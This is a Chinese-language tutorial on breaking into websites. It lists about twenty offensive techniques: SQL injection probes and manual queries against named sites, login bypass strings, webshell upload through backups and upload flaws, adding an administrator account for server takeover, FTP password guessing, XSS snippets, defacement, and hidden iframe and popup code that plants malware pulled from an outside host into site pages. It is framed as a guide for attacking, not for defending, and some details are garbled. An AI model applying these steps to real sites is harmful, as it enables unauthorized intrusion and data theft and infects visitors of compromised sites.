網站入侵思路之滲透篇
1,〓經典注入〓
通常,判斷一個網站是否存在注入點,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1
,%20and%201=2,來判斷,
如果and 1=1正常返回頁面,1=2錯誤,或者找不到,那麼就存在注入點
2,〓萬能密碼OR漏洞〓
萬能密碼'or'='or',可以用在後臺管理輸入,有的網站由於沒有過濾OR漏洞,輸入OR直接就可以突破,一般漏洞
存在於ASP型別的網站
3,〓爆庫〓
爆庫,可以理解為爆出資料庫下載,用爆庫之類的工具可以直接就獲得管理員使用者和密碼,%5C為十六進位制的
\符號,而資料庫大於5.0
就可以進行爆庫,如在PHP手工高階注入時,用VERSION()這個變數猜出網站資料庫版本,如果一個網站資料
庫大於5.0,且是ACESS
資料庫,那麼提交地址是:http://www.520jsj.com/rpc/show24.asp?id=127,我們直接把%5C加到RPC後面,因為
%5C是爆二級目錄,所以
應該是這樣,http://www.520jsj.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理員為了防止他人非
法下載資料庫,而把資料
庫改成#database.mdb,這樣防止了,如果頁面地址為http://www.xx.com/rpd/#database.mdb,是這樣的,那麼我
們把%23加到替換#
,http://www.xx.com/rpd/%23database.mdb
4,〓COOKIE中轉,SQL防注入程式,提醒你IP已被記錄〓
COOKIE中轉,SQL防注入,如果檢測一個網站時,彈出這樣一個對話方塊,上面出現SQL防注入程式提醒的字
語,那麼我們可以利用
COOKIE中轉,注入中轉來突破,方法是先搭建一個ASP環境(且網站為ASP網站),然後開啟中轉工具,記
住一個網站的頁面地址
貼上進工具裡,值是多少就寫多少,生成,把生成的檔案放到目錄裡,接下來,開啟網頁,輸入http://127.0.
0.1埠)/目錄裡文
件,如果正常,那麼輸入http://127.0.0.1:埠/值(目錄檔案)?提交值,那麼拿到工具裡猜表名,列名了
5, 〓手工〓
ASP手工語句 表名 and exists (select * from 表名)
列名 and (select count(列名) from 表名)>0
長度 and (select top 1 len(username) from admin)>0
內容 and (select top 1 asc(mid(username,1,1)) from admin)>100
PHP手工語句:order by(猜欄位),and 1=2 union select (欄位數)and 1=2 union selsect from(位置)
如果有30個欄位,那麼就應該在注入地址後輸入http://www.520jsj.com/showfo.jsp?id=130 and 1=2 union
select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28.29,30
幾個常用變數 ,USER(),VERSION()<資料庫版本),database()<資料庫名稱>
6,〓抓包拿WEBSHELL〓
如果進入後臺發現,點資料庫備份的時候發現找不到,可以通過抓包來獲得上傳,拿到WEBSHELL,工具
WOSCK抓包,一張圖片
,一個ASP馬,自行搭建一個上傳地址,UPLOAD載入,UPFILE上傳,COOKIS=( )
7,〓資料庫備份拿WEBSHELL和一句話木馬入侵〓
通常進入後臺了,發現有資料庫備份,拿WEBSHELL吧,找一個新增產品的地方,傳一個大馬,格式為
JPG圖片,然後把圖片地址
貼上到資料庫備份那裡,給起個名字,如SHELL.ASP,然後合地址訪問的時候就進入webshell了,一句話
木馬入侵,先編輯記事本,
加入一句話,改為2.jpg,然後備份,訪問,發現500內部伺服器錯誤,證明一句話成功,接下來用一句話
木馬客戶端連線,得到路徑
頁面,然後改下馬名,輸入大馬內容,提交,得到WEBSHELL
8,〓DB許可權差異備份拿WEBSHELL〓
如果一個網站注入點是MYSQL資料庫,且是DB許可權,或者是SA許可權,能夠列目錄,那麼就好辦了,找
到網站的目錄,目錄通常在
D和E盤,備份個小馬,合地址訪問看看成功沒,直接備份大馬貌似不行,成功後,再輸入大馬內容,拿
到WEBSHELL
9,〓找後臺〓
找後臺,一般預設為admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp
,login.asp,logon,user.asp,
admin/index.asp,當然,這只是預設,一些大網站不可能還用admin作為後臺,有的隱藏很深,可以簡單
用site:網站 inurl:後臺
來猜,或者下載源HTML檔案分析找出後臺,或者用各種工具來掃描了,方法很多的
10,〓指令碼提示〓
有的網站要求進入後臺會出現一個指令碼提示,就像VB程式設計裡INPUTBOX “”,一個對話輸入框,我們輸入
administrator突破,
admin代表以管理員身份來進入
11,〓php後門和EWEBEDITOR編輯器入侵〓
PHP後門,如之前爆出的DISZ漏洞,在一個PHP網站後面加C.PHP,如果出現1,那麼傳個PHP馬就拿到
WEBSHELL,
EWEBEDITOR編輯器入侵,是很快速的方式,設定好上傳檔案型別,傳ASA,或者其他的格式,然後
訪問拿到WEBSHELL
,如沒有直接加語句拿到WEBSHELL
12,〓上傳漏洞〓
有的網站雖然沒有注入點,但存在一個上傳漏洞,那麼我們如何來利用了,首先,開啟上傳地址看是
否存在,如果有,試想傳一個ASP大馬是不行的,那麼傳一句話看看,先看能成功不,用明小子來上傳,動網,
動力,動感,喬客4種方式,頁面地址格式要對應,如果一個網站地址彈出對話方塊,顯示上傳成功,那麼證明可以拿到
WEBSHELL,傳馬,另外有的沒有任何顯示,直接空的,那麼可以構建兩個上傳,第一個傳JPG的圖片,第二個傳ASP
馬(大馬),記住,大馬後面要有個空格才行,如果一個網站地址出現檔案型別不正確,請重新上傳,那麼證明%90可
以拿到WEBSHELL,只是格式不對,不允許,改字尾,只要是網站沒有過濾的格式,如果一個網站地址顯示請登陸再
上傳,那麼證明沒有拿到COOKIS,思路是在該網站註冊一個使用者,得到COOKIS,然後上傳就成功了
13,〓簡單提權拿下伺服器和SERV提權和pcanywhere三方提權〓
簡單拿下伺服器,也就是拿下網站IP主機,首先我們需要一個WEBSHELL,然後看看元件資訊,
看看路徑可讀可以寫不,如果有一個可以,那麼來到CMD命令下,首先輸入可寫的檔案內容,執行命令加一個
帳號和最高管理許可權,然後輸入netstat -an,得到主機連線埠,然後用3389連線進入,讓其成為肉雞(最好),這
樣比較隱蔽我們操作
14,〓反查入侵和旁註和社會工程學〓
反查IP入侵,也就是入侵21,埠,首先我們入侵網站先PING WWW.520jsj.com ,出IP,然後到反
查IP站點查掛了多少個域名,接下來,新增webmaster@地址,加入字典,(裡面多收集可能的口令,如123,
321,456),然後用流光探測密碼,登陸ftp://ip,輸入使用者和密碼,改掉資訊等等,社會工程學X-WAY,來得到FTP
密碼,也需要收集,並不是每個都行,總之是自己的經驗
15,〓跨站指令碼攻擊〓
跨站(CSS),被動攻擊,現在需要更多的思路和經驗了
三段經典跨站程式碼
<script>alert("跨站開始")</script>
<script>alert("document.cookie")</script>
<script>window.open(http://www.baidu.com)</script>
16〓特殊空格〓
利用TAB製作的特殊空格,然後註冊時輸入空格,加管理名字,隨便在網站上找個斑竹,或者管理
的名字,這樣來註冊,有時自己註冊的這個也會變成管理員
17,〓改主頁〓
改主頁,拿到WEBSHELL後,先找出首頁檔案,一般為index.asp,index.php.index.jsp,index.html,
然後來到站點根目錄,編輯index.asp(首頁),清空,最好備份,輸入自己的主頁程式碼(黑頁),儲存,再訪
問時已經變成自己想要的結果了
18,〓掛馬〓
首先在WEBSHELL裡,建立一個文字,改為1.htm,接下來在主頁最下面掛
兩段經典掛馬程式碼
<html>
<iframe src="http://www.x520jsj.com/2.htm" width="0" height="0" frameborder="0"></iframe>
</html>
<SCRIPT language=javascript>
window.open("http://www.520jsj.com/2.htm","","toolbar=no,location=no,directories=no,status=
no,menubar=no,scrollbars=no,width=1,height=1");
</script>
19 〓 GOOGLE BACK語句〓(很多)
inurl:asp?id= ,inurl:show.asp ,inurl:went.asp ,inurl:jsp?id=,inurl:php?id=
20,〓自尋漏洞〓
自己根據自己的技術經驗和積累